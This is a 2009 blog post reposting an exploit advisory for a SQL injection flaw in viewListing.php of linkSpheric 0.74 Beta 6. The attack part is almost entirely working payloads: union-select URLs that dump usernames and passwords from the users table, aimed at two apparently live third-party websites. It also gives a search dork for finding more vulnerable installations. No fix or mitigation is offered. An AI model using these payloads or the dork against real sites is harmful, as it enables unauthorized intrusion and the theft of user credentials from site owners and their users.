linkSpheric 0.74 Beta 6 SQL Injection Vuln ~ matthews

Tuesday, August 4, 2009

linkSpheric 0.74 Beta 6 SQL Injection Vuln

8:01 AM matthews

[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor   : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author   : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

Posted in: vulnerabilities

matthews

Tuesday, August 4, 2009

linkSpheric 0.74 Beta 6 SQL Injection Vuln

Popular Posts

Link for education

About Me

Blog Archive

Categories

news from Kecoak Elektronik Indonesia

news from SecurityFocus Vulnerabilities

adsensecamp

adbrite2

News from milw0rm

Labels

Blog Archive

Blogger templates

Blogger news

Location

Blogroll